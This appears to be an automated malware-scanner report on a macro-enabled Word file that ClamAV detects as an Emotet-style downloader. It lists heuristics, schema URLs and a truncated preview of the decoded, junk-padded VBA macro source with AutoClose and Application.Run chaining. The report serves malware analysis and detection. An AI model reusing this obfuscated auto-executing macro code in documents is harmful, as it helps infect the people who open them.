MALICIOUS
262
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is an OOXML document containing VBA macros, specifically triggering an Auto_Close macro and a CreateObject call. ClamAV identifies this as 'Doc.Malware.Emooodldr-6711604-0'. The VBA script attempts to execute other procedures via Application.Run, a common technique for downloading and executing further malicious content. The presence of the 'Emooodldr' family name in the ClamAV detection strongly suggests its identity.
Heuristics 6
-
ClamAV: Doc.Malware.Emooodldr-6711604-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 11925 bytes |
SHA-256: 912431cbe16bfd63775e4dcd9d3e9336262e1cf1e75ee5f39e3ac645bb60f95e |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub CvioEVkjSIoBLu()
WPvbGGkP = "TSIofYE" + "uUpLUBgANBu" + Left("DFWKLdTkGG", 9) + Left("qRIAUcZdJx", 10) + "VNWp" + "ZudVoki"
QQJXccHdV = 855.53 + 931.38 + Atn(755.77)
oORdFiYyzvTg = Atn(906) + 831.66 + Atn(715.85) + 402.53 + 235.17 + 58.77
gRSWGEqKp = "ddkFpAAzLFyZi" + Left("zOUMourEFZ", 9) + "QuHkdMZHZ" + Left("czUcnKfxvH", 2) + Left("FHIQwvndyS", 8)
Application.Run "kPOwEirFqjYrTW"
dpxbXqBj = Atn(751.67) - Atn(773.16) - 434.28 - 453.35
FccxqTjTzMA = "zdiMqvkwSYHRQNMFkQxEHWXojuqH" + LTrim("DqYQ")
doGiqNxB = "DjIHXqdpYukOj" + Left("IHKuQTUEOg", 10) + "EAwqUwBUMSoRqO" + Left("oAdERNHYPZ", 7)
cURkRGDOMRu = 990.5 - 700.29 - 932.38 - Atn(529.26) - Atn(835.44) - Atn(694.86) - 449.99 - 945.81 - 524.79
End Sub
Sub wLLxHSDKrCcPTL()
LRzNBVb = Atn(36.46) + Atn(446.1)
yMCSfAFFGLW = 170.25 + 521.32 + Atn(644.47)
Application.Run "iQnwvRGoQABoxJA"
iZDcLuqNTWOR = "Ybi" + "uUvAyGuOwAYdJ" + Left("qqFLKJBKgP", 10)
dYFUdgurbI = Atn(584.1) + Atn(553.14)
ijQCCMDjWFoI = "JdrUSnM" + "CNiwYwUrbnLrYPHFJcqQzA" + "YHIf"
QFRzAiXUB = 5.1 - 820.54 - Atn(311.94) - Atn(825.67) - 202.72
AQGAnQjgp = LTrim("EbpVPqfXiCFJEuyqBSQ") + LTrim("rrSMTJZjPxpdTCi")
End Sub
Public Function QqGfJXbAuSyVxJdYXG(DvgIoLLBXJTxrYZQuU, NIfbJuQfBYOCMMjfvg, kPqLKcOOSHMiGyLGn)
DKPzBWSGZZyZ = Atn(556.28) + Atn(394.77) + 935.68 + Atn(895.36)
JYpJcduykuI = 381.6 - 246.46 - Atn(484.99) - Atn(564.26) - Atn(454.89)
GEKXukYOCu = Atn(972.5) + 68.24 + 758.95 + Atn(8.75) + 287.74
QqGfJXbAuSyVxJdYXG = Replace(DvgIoLLBXJTxrYZQuU, NIfbJuQfBYOCMMjfvg, kPqLKcOOSHMiGyLGn)
uMJDyiPH = "vYBAMSW" + "DqGMFCOJULNxU" + "wCU" + Left("DPbKySiLJj", 2)
PnXpwuyyuPK = Left("fwRcBCIYpp", 4) + "fqY" + "gzADcwOMiq" + "ggxI"
DKYEPzOUgWfQ = RTrim("bRnvEWVLMPGjdzBEECqkH") + "oObkUIUMEqFUJQpFnRKdKybpZidAK"
iFkfinDbwTU = "oIwjNBuviNdIFJzXG" + "rOTnrVjEKFyRbAZCAPPFErdAx"
BiJvVvgJzqiB = "nicMEXHIrMAiFG" + "uRrBiExQNVWcwO" + Left("MARZbRHzZn", 7)
pBpMfSYZgTA = "CYOUzCJ" + "xfx" + Left("LHuiAWpTdM", 3) + "kDpFIgNPCnXSp" + Left("GUJZwULNYk", 6)
UiAbnYJWVnKk = "KfkNj" + Left("vIUyYMYrkC", 7) + Left("EGQDYcIfyN", 8)
CWWgVKH = RTrim("IdZOCDgMdWvQBGB") + LTrim("SIRxocxwIKZJbdzFUwSYngboyA")
SXTqWGvT = Atn(943.14) + 19.41 + Atn(494.89) + 208.55 + 506.87 + 232.81 + 730.85
TEqTpIW = 204.15 - 308.79 - 481.88 - 315.13 - Atn(906.78)
fnRknLZbD = Atn(199.12) + Atn(476.49) + 570.6 + Atn(75.55)
DoXVnAHriGfX = Atn(974.32) - Atn(566.18) - Atn(38.5) - 987.66
PiIViiTwjEO = 826.56 - Atn(919.73)
BCbKbNK = Left("DObkruKnSx", 6) + Left("yVxpwnArNF", 10) + "KocwOuACWi"
GfXuZGUWW = RTrim("jKRcSHgpcKCYwG") + "GDEgxuPrnHBVNNcgoEDCxwugA"
fYMkCVMDBK = Atn(395.83) + Atn(672.1) + 649.6 + Atn(46.98)
End Function
Sub kPOwEirFqjYrTW()
iKODWVVuoHE = 350.9 - 430.57 - 437.16 - Atn(716.35) - 109.1 - Atn(963.88)
OJrZQfLk = RTrim("DYz") + "EnoGzIMEdGNTVjEBXXQJ" + "pYgkHxjoHSQIESiGrvOSkQPI"
vvoUrEqqjYUj = 738.89 - 866.88 - 319.42 - Atn(819.87) - 581.5
zuBVNvwwN = 600.28 + 943.5 + Atn(933.18)
Application.Run "dxpcqnVIPFSpvQ"
XqwnpLqFG = RTrim("DNDSjykbr") + LTrim("WrkrDJwIqLFrpIIrgjVcUDpFo") + "kfWnwpBPT"
CQTOLQo = "ZRzEqkQ" + Left("AjdigGyVkJ", 9)
vvpCGOPXcX = "DXWQjDFuPjwKGNq" + Left("GOKnERcXXV", 6) + Left("ZWxbFjZUFT", 4) + "JWo"
QBPkJZF = 90.46 - Atn(697.61) - 785.34 - 575.51
rjGYPnpGuAZ = "KXMrAbuNjdiDq" + "OXSXfBKQ" + Left("IwJKUBubnB", 7) + "PNvc" + "Qwn"
End Sub
Sub AutoClose()
NHxfdxWgZR = "bxGzMBcnPcCVRTqbWjo" + RTrim("SozFYgwgyzIodPWoAqDYE") + "ODSFfXDGcVvNEXZvdnOpHouQ" + LTrim("bEjMwCyqFHuSgXgrXkDWHwOIY")
uPxFyRIN = "BcyOnqQVVbTIyqp" + "ZkLINWJk" + Left("QgZEBTnrDA", 8)
iXYozSvdDM = Left("JLyIvIkOXS", 6) + Left("kCiuYBcZdz", 8) + "xYbNAofDfySjU"
oEzNTogQRdOp = 207.23 - Atn(689.76) - Atn(652.87) - 317.41 - 402.72 - Atn(125.64)
VpUquKRiHgoA = "iixLrB" + Left("kkAVAYxnii", 9
... (truncated)
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 34816 bytes |
SHA-256: d7b5413eabbf2619d9215043a897d041dfcfe1e9b4930836987efd202d7d6097 |
|||
|
Detection
ClamAV:
Doc.Malware.Emooodldr-6711604-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.